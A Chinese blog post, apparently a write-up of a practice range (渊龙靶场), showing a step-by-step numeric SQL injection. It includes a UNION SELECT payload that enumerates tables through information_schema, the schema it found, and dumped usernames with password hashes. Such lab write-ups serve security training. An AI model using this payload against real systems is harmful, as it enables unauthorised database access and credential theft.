当前位置: 首页 > news >正文

渊龙靶场-sql注入(数字型注入)

1.开局请求抓包

测试点如上图,测试注入,存在注入。

2.查询列数

我们再查他多少列 ,最后测试为为2列。

3.查询回显位

发现均可以回显

4.查询表 

插入语句查询表和数据库

union select database(),group_concat(table_name) FROM information_schema.tables WHERE table_schema=database() --+ 

得到数据库和表

库:s2747857  表:httpinfo,member,message,users,xssblind

5.查询列: 

然后就找列:

user表:id,username,password,level

httpinfo表:id,userid,ipaddress,useragent,httpaccept,remoteport

member表:id,username,pw,sex,phonenum,address,email

message表:id,content,time

xssblind表:id,time,content,name

6.查询值

因为库,表,字段均已知了,所以直接查询就好了

这里查询user表字段吧。 id,username,password,level

1admine10adc3949ba59abbe56e057f20f883e1,2pikachu670b14728ad9902aecba32e22fa4f6bd2,3teste99a18c428cb38d5f260853678922e033

到此就结束了。

相关文章:

  • Redis部署架构详解:原理、场景与最佳实践
  • docker使用sh脚本创建容器,保持容器正常运行,异常关闭后马上重启
  • C++哈希表:冲突解决与高效查找
  • 总结:线程安全问题的原因和解决方案
  • 结构化控制语言(SCL) 与梯形图(LAD)相互转换的步骤指南
  • 16QAM在瑞利信道下的性能仿真:从理论到实践的完整解析(附完整代码)
  • PH热榜 | 2025-06-01
  • SpringBoot-Thymeleaf
  • Arch安装botw-save-state
  • Google 发布的全新导航库:Jetpack Navigation 3
  • MySQL中的事务
  • Figma 中构建 Master Control Panel (MCP) 的完整设计方案
  • 【python深度学习】Day43 复习日
  • Go开发简历优化指南
  • ESP-IDF 离线安装——同时存在多个版本以及进行版本切换的方法
  • 头指针 VS 头节点 VS 首元节点
  • Day43打卡(补41+42) @浙大疏锦行
  • 【dshow】VIDEOINFOHEADER2 头文件
  • Java内存模型与互斥锁
  • Nuxt3部署
  • 杭州做网站的企业/大冶seo网站优化排名推荐
  • 网站建设的常见问题/杭州百度公司在哪里
  • 湘潭网站建设网站推广/系统开发
  • 开封市网站建设公司/南京百度seo代理
  • 工信部怎么查网站备案/近期新闻热点事件简短
  • 成都六度网站建设/网站排名优化公司